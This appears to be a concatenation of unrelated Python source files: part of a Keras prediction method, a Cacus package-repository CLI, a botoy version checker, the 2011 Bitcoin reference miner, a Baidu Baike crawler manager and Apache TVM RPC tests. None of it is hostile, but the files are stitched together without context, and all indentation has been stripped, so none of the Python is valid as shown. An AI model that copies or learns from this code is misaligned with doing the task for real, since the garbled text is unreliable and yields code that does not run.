averages = []
for i in range(len(outs)):
averages.append(np.average([out[i] for out in all_outs],
weights=batch_sizes))
return averages
@interfaces.legacy_generator_methods_support
def predict_generator(self, generator, steps,
max_q_size=10, workers=1,
pickle_safe=False, verbose=0):
"""Generates predictions for the input samples from a data generator.
The generator should return the same kind of data as accepted by
`predict_on_batch`.
# Arguments
generator: Generator yielding batches of input samples.
steps: Total number of steps (batches of samples)
to yield from `generator` before stopping.
max_q_size: Maximum size for the generator queue.
workers: Maximum number of processes to spin up
when using process based threading
pickle_safe: If `True`, use process based threading.
Note that because
this implementation relies on multiprocessing,
you should not pass
non picklable arguments to the generator
as they can't be passed
easily to children processes.
verbose: verbosity mode, 0 or 1.
# Returns
Numpy array(s) of predictions.
# Raises
ValueError: In case the generator yields
data in an invalid format.
"""
self._make_predict_function()
steps_done = 0
wait_time = 0.01
all_outs = []
enqueuer = None
try:
enqueuer = GeneratorEnqueuer(generator, pickle_safe=pickle_safe)
enqueuer.start(workers=workers, max_q_size=max_q_size)
if verbose == 1:
progbar = Progbar(target=steps)
while steps_done < steps:
generator_output = None
while enqueuer.is_running():
if not enqueuer.queue.empty():
generator_output = enqueuer.queue.get()
break
else:
time.sleep(wait_time)
if isinstance(generator_output, tuple):
# Compatibility with the generators
# used for training.
if len(generator_output) == 2:
x, _ = generator_output
elif len(generator_output) == 3:
x, _, _ = generator_output
else:
raise ValueError('output of generator should be '
'a tuple `(x, y, sample_weight)` '
'or `(x, y)`. Found: ' +
str(generator_output))
else:
# Assumes a generator that only
# yields inputs (not targets and sample weights).
x = generator_output
outs = self.predict_on_batch(x)
if not isinstance(outs, list):
outs = [outs]
if not all_outs:
for out in outs:
all_outs.append([])
for i, out in enumerate(outs):
all_outs[i].append(out)
steps_done += 1
if verbose == 1:
progbar.update(steps_done)
finally:
if enqueuer is not None:
enqueuer.stop()
if len(all_outs) == 1:
if steps_done == 1:
return all_outs[0][0]
else:
return np.concatenate(all_outs[0])
if steps_done == 1:
return [out for out in all_outs]
else:
return [np.concatenate(out) for out in all_outs]
|
cli.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import argparse
import logging
import traceback
# TODO feel free to PR if you know how to log tracebacks in more elegant way
# atm it for some reason doubles traceback string
class MyLogger(logging.getLoggerClass()):
user = None
def makeRecord(self, name, lvl, fn, lno, msg, args, exc_info, func=None, extra=None, sinfo=None):
if not extra:
extra = {}
extra['user'] = self.user or 'N/A'
return super(MyLogger, self).makeRecord(name, lvl, fn, lno, msg, args, exc_info, func=func, extra=extra, sinfo=None)
def error(self, msg, *args, **kwargs):
if sys.exc_info()[0]:
msg = str(msg) + "\n{}".format(traceback.format_exc().replace('%', '%%'))
return super(MyLogger, self).error(msg, *args, **kwargs)
def critical(self, msg, *args, **kwargs):
if sys.exc_info()[0]:
msg = str(msg) + "\n{}".format(traceback.format_exc().replace('%', '%%'))
return super(MyLogger, self).error(msg, *args, **kwargs)
logging.setLoggerClass(MyLogger)
from . import repo_manage
from . import repo_daemon
from . import duploader
from . import distro_import
env_choices = ['unstable', 'testing', 'prestable', 'stable']
def main():
parser = argparse.ArgumentParser(description='Cacus repo tool')
parser.add_argument('-l', '--log', type=str, default='/dev/stderr',
help='Log to file (defaut stderr)')
parser.add_argument('-c', '--config', type=str,
help='Config file (default /etc/cacus.yaml')
parser.add_argument('-v', '--verbosity', type=str, default='error',
help='Log file verbosity (default is "error")')
op_type = parser.add_mutually_exclusive_group()
op_type.add_argument('--create-indexes', action='store_true', help='Create MongoDB indexes')
op_type.add_argument('--duploader-daemon', action='store_true', help='Start duploader daemon')
op_type.add_argument('--repo-daemon', action='store_true', help='Start repository daemon')
op_type.add_argument('--gen-token', type=str, metavar='NAME',
help='Generate JWT token for NAME')
op_type.add_argument('--revoke-token', type=str, metavar='JTI',
help='Revoke JWT token with jti=JTI')
op_type.add_argument('--list-tokens', action='store_true',
help='List known JWT tokens')
op_type.add_argument('--get-token', type=str, metavar='JTI',
help='Get token by ID')
op_type.add_argument('--update-distro', metavar='DISTRO', nargs='?', help='Update distribution metadata')
op_type.add_argument('--import-distro', type=str, nargs=2, metavar=('URL', 'NAME'), help='Import distribution')
parser.add_argument('--download-packages', action='store_true', help='Download imported packages')
parser.add_argument('-t', '--threads', type=int, default=10, help='Import download threads')
parser.add_argument('-e', '--expire', type=int, help='Expiration period for JWT token')
parser.add_argument('-d', '--distro', type=str, nargs='*', help='Distros that will be manageable by this JWT token. If omitted, token will have root access.')
"""
op_type.add_argument('--upload', action='store_true', help='Upload package(s)')
op_type.add_argument('--remove', action='store_true', help='Remove package(s)')
op_type.add_argument('--dmove', nargs=2, metavar=('PKG', 'VER'), help='Dmove package(s)')
# op_type.add_argument('--import-repo', type=str, metavar='PATH', help='Import mounted dist.yandex.ru repo')
parser.add_argument('--from', choices=env_choices, help='From env')
parser.add_argument('--to', choices=env_choices, help='To env')
parser.add_argument('--repo', type=str, help='Repository')
parser.add_argument('--arch', type=str, help='Architecture')
parser.add_argument('--env', choices=env_choices, help='Environment')
parser.add_argument('pkgs', type=str, nargs='*')
"""
args = parser.parse_args()
if args.duploader_daemon:
duploader.start_daemon(args.config)
elif args.repo_daemon:
repo_daemon.start_daemon(args.config)
elif args.update_distro:
manager = repo_manage.RepoManager(config_file=args.config)
manager.update_distro_metadata(args.update_distro)
elif args.import_distro:
importer = distro_import.DistroImporter(args.threads, config_file=args.config)
importer.import_distro(args.import_distro[0], args.import_distro[1], download_packages=args.download_packages)
elif args.create_indexes:
manager = repo_manage.RepoManager(config_file=args.config)
manager.create_cacus_indexes()
manager.create_packages_indexes()
elif args.gen_token:
if not args.expire:
parser.error("Specify expiration period in days")
manager = repo_manage.RepoManager(config_file=args.config, quiet=True)
token = manager.generate_token(args.gen_token, args.expire, args.distro)
print("Generated token for '{}' with {}; valid for {} days:\n{}".format(
args.gen_token, 'access to distros: ' + ', '.join(args.distro) if args.distro else 'ROOT access',
args.expire, token))
elif args.revoke_token:
manager = repo_manage.RepoManager(config_file=args.config, quiet=True)
if manager.revoke_token(args.revoke_token):
print("Revoked token with jti={}".format(args.revoke_token))
else:
print("Cannot find token with jti={}".format(args.revoke_token))
elif args.list_tokens:
manager = repo_manage.RepoManager(config_file=args.config, quiet=True)
manager.print_tokens()
elif args.get_token:
manager = repo_manage.RepoManager(config_file=args.config, quiet=True)
print(manager.get_token(args.get_token))
else:
# default action is to start both duploader daemon and repo daemon
from multiprocessing import Process
repod = Process(target=repo_daemon.start_daemon, args=(args.config,))
duploaderd = Process(target=duploader.start_daemon, args=(args.config,))
repod.start()
duploaderd.start()
repod.join()
duploaderd.join()
if __name__ == '__main__':
main()
|
__version__.py
|
# pylint: disable=C0415,C0413
# type: ignore
__version__ = "7.9"
def check_version():
def _check_version():
import sys
from distutils.version import LooseVersion as V
from xml.etree import ElementTree
import httpx
try:
latest_version = V(
ElementTree.fromstring(
httpx.get(
"https://pypi.org/rss/project/botoy/releases.xml", timeout=10
).text
)
.find("channel")
.find("item")
.find("title")
.text
)
except Exception:
pass
else:
local_version = V(__version__)
if local_version < latest_version:
info = f"\n\033[33m==== 当前版本为: \033[31m{local_version}\033[33m, 已有最新版本: \033[31m{latest_version}\033[33m, 请及时更新! ====\033[0m\n"
sys.stdout.write(info)
from threading import Thread
t = Thread(target=_check_version)
t.setDaemon(True)
t.start()
|
pyminer.py
|
#!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class BitcoinRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = BitcoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 36350
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
node_manager.py
|
#!/usr/bin/env python3
from os import path
from multiprocessing.managers import BaseManager
from multiprocessing import Process, Queue
import time
from url_manager import UrlManager
from data_output import DataOutput
__author__ = 'Aollio Hou'
__email__ = 'aollio@outlook.com'
class NodeManager:
def start_manager(self, url_q, result_q):
"""
创建一个分布式管理器
:param url_q: url队列
:param result_q: 结果队列
:return:
"""
BaseManager.register('get_task_queue', callable=lambda: url_q)
BaseManager.register('get_result_queue', callable=lambda: result_q)
# 绑定端口8001, 设置验证口令 'baike'. 这个相当于对象的初始化
manager = BaseManager(address=('127.0.0.1', 8001), authkey=b'baike')
return manager
def url_manager_proc(self, url_q: Queue, conn_q: Queue, root_url):
print('url manager process start...')
url_manager = UrlManager()
url_manager.add_new_url(root_url)
print('url manager process started...')
while True:
while url_manager.has_new_url():
new_url = url_manager.get_new_url()
print('new_url', new_url)
# 将新的URL发给工作节点
url_q.put(new_url)
# 加一个判断条件, 当爬取2000个链接后就关闭, 并保存进度
if url_manager.old_url_size() > 2000:
# 通知爬行节点工作结束
url_q.put('end')
print('控制节点发起结束通知')
# 关闭管理节点, 同事存储set状态
url_manager.save_process(path.join('dist', 'new_urls.txt'), url_manager.new_urls)
url_manager.save_process(path.join('dist', 'old_urls.txt'), url_manager.old_urls)
return
# 将从result_solve_proc 获取到的URL添加到URL管理器
try:
if not conn_q.empty():
urls = conn_q.get()
url_manager.add_new_urls(urls)
except BaseException as e:
time.sleep(0.1)
def result_solve_proc(self, result_q: Queue, conn_q: Queue, store_q: Queue):
while True:
try:
if not result_q.empty():
content = result_q.get()
if content['new_urls'] == 'end':
print('结果分析进程接收通知然后结束!')
store_q.put('end')
return
conn_q.put(content['new_urls']) # url为set类型
store_q.put(content['data']) # 解析出来数据为dict类型
else:
time.sleep(0.1)
except BaseException as e:
time.sleep(0.1)
def store_proc(self, store_q: Queue):
output = DataOutput()
while True:
if not store_q.empty():
data = store_q.get()
if data == 'end':
print('存储进程接收通知然后结束!')
output.flush_data()
output.output_end(output.filepath)
return
output.store_data(data)
else:
time.sleep(0.1)
def main():
print('init...')
# 初始化各个管理进程需要的通信通道
# url_q队列是URL管理进程将URL传递给爬虫节点的通道
url_q = Queue()
# result_q是爬虫节点将数据返回给数据提取进程的通道
result_q = Queue()
# 数据提取进程将新的URL数据提交给URL管理进程的通道
conn_q = Queue()
#
store_q = Queue()
# 创建分布式管理器
node = NodeManager()
manager = node.start_manager(url_q, result_q)
# 创建URL管理进程, 数据提取进程和数据存储进程
root_url = "https://baike.baidu.com/item/网络爬虫/5162711"
url_manager_proc = Process(target=node.url_manager_proc, args=(url_q, conn_q, root_url))
result_solve_proc = Process(target=node.result_solve_proc, args=(result_q, conn_q, store_q))
store_proc = Process(target=node.store_proc, args=(store_q,))
# 启动三个进程和分布式管理器
url_manager_proc.start()
result_solve_proc.start()
store_proc.start()
print('init finish.')
manager.get_server().serve_forever()
if __name__ == '__main__':
main()
|
test_runtime_rpc.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import tvm
from tvm import te
import tvm.testing
import logging
import multiprocessing
import os
import stat
import sys
import time
import pytest
import numpy as np
from tvm import rpc
from tvm.contrib import utils, cc
from tvm.rpc.tracker import Tracker
if __name__ == "__main__":
# NOTE: must live here to avoid registering PackedFunc with libtvm.so twice.
sys.exit(pytest.main([__file__] + sys.argv[1:]))
# tkonolige: The issue as I understand it is this: multiprocessing's spawn
# method launches a new process and then imports the relevant modules. This
# means that all registered functions must exist at the top level scope. In
# this file they are, so all is well when we run this file directly.
# However, when run under pytest, the functions aren't registered on the
# server. I believe this is because pytest is also using multiprocessing to
# run individual functions. Somewhere along the way, the imports are being
# lost, so the server ends up not registering the functions.
pytestmark = pytest.mark.skipif(
# Windows does not support fork so we can enable Windows for testing
sys.platform.startswith("win") == False and multiprocessing.get_start_method() != "fork",
reason=(
"pytest + multiprocessing spawn method causes tvm.register_func to "
"not work on the rpc.Server."
),
)
@tvm.testing.requires_rpc
def test_bigendian_rpc():
"""Test big endian rpc when there is a PowerPC RPC server available"""
host = os.environ.get("TVM_POWERPC_TEST_HOST", None)
port = os.environ.get("TVM_POWERPC_TEST_PORT", 9090)
if host is None:
return
def verify_rpc(remote, target, shape, dtype):
A = te.placeholder(shape, dtype=dtype)
B = te.compute(A.shape, lambda i: A[i] + tvm.tir.const(1, A.dtype))
s = te.create_schedule(B.op)
f = tvm.build(s, [A, B], target, name="myadd")
dev = remote.cpu(0)
a = tvm.nd.array(np.random.randint(0, 256, size=shape).astype(A.dtype), device=dev)
b = tvm.nd.array(np.zeros(shape).astype(A.dtype), device=dev)
temp = utils.tempdir()
path_dso = temp.relpath("dev_lib.o")
f.save(path_dso)
remote.upload(path_dso)
f = remote.load_module("dev_lib.o")
f(a, b)
tvm.testing.assert_allclose(a.numpy() + 1, b.numpy())
print("Test RPC connection to PowerPC...")
remote = rpc.connect(host, port)
target = "llvm -mtriple=powerpc-linux-gnu"
for dtype in ["float32", "float64", "int32", "int8"]:
verify_rpc(remote, target, (10,), dtype)
@tvm.testing.requires_rpc
def test_rpc_simple():
server = rpc.Server(key="x1")
client = rpc.connect("127.0.0.1", server.port, key="x1")
f1 = client.get_function("rpc.test.addone")
assert f1(10) == 11
f3 = client.get_function("rpc.test.except")
with pytest.raises(tvm._ffi.base.TVMError):
f3("abc")
f2 = client.get_function("rpc.test.strcat")
assert f2("abc", 11) == "abc:11"
@tvm.testing.requires_rpc
def test_rpc_runtime_string():
server = rpc.Server(key="x1")
client = rpc.connect("127.0.0.1", server.port, key="x1")
func = client.get_function("rpc.test.runtime_str_concat")
x = tvm.runtime.container.String("abc")
y = tvm.runtime.container.String("def")
assert str(func(x, y)) == "abcdef"
@tvm.testing.requires_rpc
def test_rpc_array():
x = np.ones((3, 4))
server = rpc.Server()
remote = rpc.connect("127.0.0.1", server.port)
r_cpu = tvm.nd.array(x, remote.cpu(0))
assert str(r_cpu.device).startswith("remote")
np.testing.assert_equal(r_cpu.numpy(), x)
fremote = remote.get_function("rpc.test.remote_array_func")
fremote(r_cpu)
@tvm.testing.requires_rpc
def test_rpc_large_array():
# testcase of large array creation
server = rpc.Server()
remote = rpc.connect("127.0.0.1", server.port)
dev = remote.cpu(0)
a_np = np.ones((5041, 720)).astype("float32")
b_np = np.ones((720, 192)).astype("float32")
a = tvm.nd.array(a_np, dev)
b = tvm.nd.array(b_np, dev)
np.testing.assert_equal(a.numpy(), a_np)
np.testing.assert_equal(b.numpy(), b_np)
@tvm.testing.requires_rpc
def test_rpc_echo():
def check(remote):
fecho = remote.get_function("testing.echo")
assert fecho(1, 2, 3) == 1
assert fecho(100, 2, 3) == 100
assert fecho("xyz") == "xyz"
assert bytes(fecho(bytearray(b"123"))) == b"123"
with pytest.raises(RuntimeError):
raise_err = remote.get_function("testing.test_raise_error_callback")("RuntimeError")
raise_err()
remote.cpu().sync()
with pytest.raises(AttributeError):
f3 = remote.system_lib()["notexist"]
temp = rpc.server._server_env([])
server = rpc.Server()
client = rpc.connect("127.0.0.1", server.port)
check(rpc.LocalSession())
check(client)
def check_minrpc():
if tvm.get_global_func("rpc.CreatePipeClient", allow_missing=True) is None:
return
# Test minrpc server.
temp = utils.tempdir()
minrpc_exec = temp.relpath("minrpc")
tvm.rpc.with_minrpc(cc.create_executable)(minrpc_exec, [])
check(rpc.PopenSession(minrpc_exec))
# minrpc on the remote
server = rpc.Server()
client = rpc.connect(
"127.0.0.1",
server.port,
session_constructor_args=["rpc.PopenSession", open(minrpc_exec, "rb").read()],
)
check(client)
check_minrpc()
@tvm.testing.requires_rpc
def test_rpc_file_exchange():
server = rpc.Server()
remote = rpc.connect("127.0.0.1", server.port)
blob = bytearray(np.random.randint(0, 10, size=(10)))
remote.upload(blob, "dat.bin")
rev = remote.download("dat.bin")
assert rev == blob
@tvm.testing.requires_rpc
@tvm.testing.requires_llvm
def test_rpc_remote_module():
# graph
n = tvm.runtime.convert(102)
A = te.placeholder((n,), name="A")
B = te.compute(A.shape, lambda *i: A(*i) + 1.0, name="B")
s = te.create_schedule(B.op)
server0 = rpc.Server(key="x0")
server1 = rpc.Server(key="x1")
client = rpc.connect(
"127.0.0.1",
server0.port,
key="x0",
session_constructor_args=["rpc.Connect", "127.0.0.1", server1.port, "x1"],
)
def check_remote(remote):
temp = utils.tempdir()
dev = remote.cpu(0)
f = tvm.build(s, [A, B], "llvm", name="myadd")
path_dso = temp.relpath("dev_lib.so")
f.export_library(path_dso)
remote.upload(path_dso)
f1 = remote.load_module("dev_lib.so")
a = tvm.nd.array(np.random.uniform(size=102).astype(A.dtype), dev)
b = tvm.nd.array(np.zeros(102, dtype=A.dtype), dev)
time_f = f1.time_evaluator(f1.entry_name, remote.cpu(0), number=10)
cost = time_f(a, b).mean
print("%g secs/op" % cost)
np.testing.assert_equal(b.numpy(), a.numpy() + 1)
# Download the file from the remote
path_tar = temp.relpath("dev_lib.tar")
f.export_library(path_tar)
remote.upload(path_tar)
local_download_path = temp.relpath("dev_lib.download.so")
with open(local_download_path, "wb") as fo:
fo.write(remote.download_linked_module("dev_lib.tar"))
fupdated = tvm.runtime.load_module(local_download_path)
a = tvm.nd.array(np.random.uniform(size=102).astype(A.dtype), tvm.cpu(0))
b = tvm.nd.array(np.zeros(102, dtype=A.dtype), tvm.cpu(0))
fupdated(a, b)
np.testing.assert_equal(b.numpy(), a.numpy() + 1)
def check_minrpc():
if tvm.get_global_func("rpc.CreatePipeClient", allow_missing=True) is None:
return
# export to minrpc
temp = utils.tempdir()
f = tvm.build(s, [A, B], "llvm --system-lib", name="myadd")
path_minrpc = temp.relpath("dev_lib.minrpc")
f.export_library(path_minrpc, rpc.with_minrpc(cc.create_executable))
with pytest.raises(RuntimeError):
rpc.PopenSession("filenotexist")
# statrt the minrpc session.
remote = tvm.rpc.PopenSession(path_minrpc)
dev = remote.cpu(0)
f1 = remote.system_lib()
a = tvm.nd.array(np.random.uniform(size=102).astype(A.dtype), dev)
b = tvm.nd.array(np.zeros(102, dtype=A.dtype), dev)
time_f = f1.time_evaluator("myadd", remote.cpu(0), number=1)
cost = time_f(a, b).mean
np.testing.assert_equal(b.numpy(), a.numpy() + 1)
# change to not executable
os.chmod(path_minrpc, stat.S_IRUSR)
with pytest.raises(RuntimeError):
rpc.PopenSession(path_minrpc)
def check_remote_link_cl(remote):
"""Test function to run remote code such as cl
This is not enabled because there is forking issue
of TVM runtime when server launches after OpenCL
runtime initializes. We leave it as an example
on how to do rpc when we want to do linking on remote.
"""
if not tvm.testing.device_enabled("opencl"):
print("Skip because opencl is not enabled")
return
temp = utils.tempdir()
dev = remote.cl(0)
s = te.create_schedule(B.op)
xo, xi = s[B].split(B.op.axis[0], factor=32)
s[B].bind(xo, te.thread_axis("blockIdx.x"))
s[B].bind(xi, te.thread_axis("threadIdx.x"))
f = tvm.build(s, [A, B], "opencl --host=llvm", name="myadd")
# Option 1: save modules separately and rely on remote compiler
path_o = temp.relpath("myadd.o")
path_cl = temp.relpath("myadd.cl")
path_json = temp.relpath("myadd.tvm_meta.json")
f.save(path_o)
f.imported_modules[0].save(path_cl)
remote.upload(path_o)
remote.upload(path_cl)
# upload meta data
remote.upload(path_json)
fhost = remote.load_module("myadd.o")
fdev = remote.load_module("myadd.cl")
fhost.import_module(fdev)
a = tvm.nd.array(np.random.uniform(size=102).astype(A.dtype), dev)
b = tvm.nd.array(np.zeros(102, dtype=A.dtype), dev)
fhost(a, b)
np.testing.assert_equal(b.numpy(), a.numpy() + 1)
# Option 2: export library as a tar ball then handled by remote compiler
path_tar = temp.relpath("myadd.tar")
f.export_library(path_tar)
remote.upload(path_tar)
fhost = remote.load_module("myadd.tar")
a = tvm.nd.array(np.random.uniform(size=102).astype(A.dtype), dev)
b = tvm.nd.array(np.zeros(102, dtype=A.dtype), dev)
fhost(a, b)
np.testing.assert_equal(b.numpy(), a.numpy() + 1)
check_remote(rpc.LocalSession())
check_remote(client)
check_minrpc()
@tvm.testing.requires_rpc
def test_rpc_return_func():
server = rpc.Server(key="x1")
client = rpc.connect("127.0.0.1", server.port, key="x1")
f1 = client.get_function("rpc.test.add_to_lhs")
fadd = f1(10)
assert fadd(12) == 22
@tvm.testing.requires_rpc
def test_rpc_session_constructor_args():
# start server
server0 = rpc.Server(key="x0")
server1 = rpc.Server(key="x1")
def check_multi_hop():
# use server0 as proxy to connect to server1
client = rpc.connect(
"127.0.0.1",
server0.port,
key="x0",
session_constructor_args=["rpc.Connect", "127.0.0.1", server1.port, "x1"],
)
fecho = client.get_function("testing.echo")
assert fecho(1, 2, 3) == 1
assert fecho(100, 2, 3) == 100
assert fecho("xyz") == "xyz"
assert bytes(fecho(bytearray(b"123"))) == b"123"
nd = tvm.nd.array([1, 2, 3], device=client.cpu(0))
assert nd.numpy()[1] == 2
def check_error_handling():
with pytest.raises(tvm.error.RPCError):
client = rpc.connect(
"127.0.0.1",
server0.port,
key="x0",
session_constructor_args=["rpc.NonExistingConstructor"],
)
check_multi_hop()
check_error_handling()
@tvm.testing.requires_rpc
def test_rpc_return_ndarray():
# start server
server = rpc.Server(key="x1")
client = rpc.connect("127.0.0.1", server.port, key="x1")
m = client.get_function("rpc.test.remote_return_nd")
get_arr = m("get_arr")
ref_count = m("ref_count")
get_elem = m("get_elem")
get_arr_elem = m("get_arr_elem")
# array test
def run_arr_test():
arr = get_arr()
assert get_elem(0) == 0.0
assert get_arr_elem(arr, 0) == 0.0
run_arr_test()
@tvm.testing.requires_rpc
def test_local_func():
client = rpc.LocalSession()
f1 = client.get_function("rpc.test.add_to_lhs")
fadd = f1(10)
assert fadd(12) == 22
blob = bytearray(np.random.randint(0, 10, size=(10)))
client.upload(blob, "dat.bin")
rev = client.download("dat.bin")
assert rev == blob
@tvm.testing.requires_rpc
def test_rpc_tracker_register():
# test registration
tracker = Tracker(port=9000, port_end=10000)
device_key = "test_device"
server1 = rpc.Server(
host="127.0.0.1",
port=9000,
port_end=10000,
key=device_key,
tracker_addr=("127.0.0.1", tracker.port),
)
server2 = rpc.Server(
host="127.0.0.1",
port=9000,
port_end=10000,
key=device_key,
tracker_addr=("127.0.0.1", tracker.port),
custom_addr="test_addr", # this is a test address, which is unable to connect
)
time.sleep(1)
client = rpc.connect_tracker("127.0.0.1", tracker.port)
def exist_address(summary, key, host, port):
server_info = summary["server_info"]
for device in server_info:
if device["key"] == "server:%s" % key:
addr = device["addr"]
if (host is None or host == addr[0]) and port == addr[1]:
return True
return False
summary = client.summary()
assert summary["queue_info"][device_key]["free"] == 2
assert exist_address(summary, device_key, "127.0.0.1", server1.port)
assert exist_address(summary, device_key, "test_addr", server2.port)
remote = client.request(device_key)
summary = client.summary()
assert summary["queue_info"][device_key]["free"] == 1
del remote
time.sleep(1)
summary = client.summary()
assert summary["queue_info"][device_key]["free"] == 2
server1.terminate()
time.sleep(1)
summary = client.summary()
assert summary["queue_info"][device_key]["free"] == 1
assert not exist_address(summary, device_key, "127.0.0.1", server1.port)
assert exist_address(summary, device_key, "test_addr", server2.port)
server2.terminate()
time.sleep(1)
summary = client.summary()
assert summary["queue_info"][device_key]["free"] == 0
assert not exist_address(summary, device_key, "test_addr", server2.port)
tracker.terminate()
def _target(host, port, device_key, timeout):
client = rpc.connect_tracker(host, port)
remote = client.request(device_key, session_timeout=timeout)
while True:
pass
remote.cpu()
@tvm.testing.requires_rpc
def test_rpc_tracker_request():
# test concurrent request
tracker = Tracker(port=9000, port_end=10000)
device_key = "test_device"
server = rpc.Server(
port=9000,
port_end=10000,
key=device_key,
tracker_addr=("127.0.0.1", tracker.port),
)
client = rpc.connect_tracker("127.0.0.1", tracker.port)
proc1 = multiprocessing.Process(target=_target, args=("127.0.0.1", tracker.port, device_key, 4))
proc2 = multiprocessing.Process(
target=_target, args=("127.0.0.1", tracker.port, device_key, 200)
)
proc1.start()
time.sleep(0.5)
proc2.start()
time.sleep(0.5)
summary = client.summary()
assert summary["queue_info"][device_key]["free"] == 0
assert summary["queue_info"][device_key]["pending"] == 1
proc1.terminate()
proc1.join()
time.sleep(0.5)
summary = client.summary()
assert summary["queue_info"][device_key]["free"] == 0
assert summary["queue_info"][device_key]["pending"] == 0
proc2.terminate()
proc2.join()
server.terminate()
tracker.terminate()
|
__init__.py
|
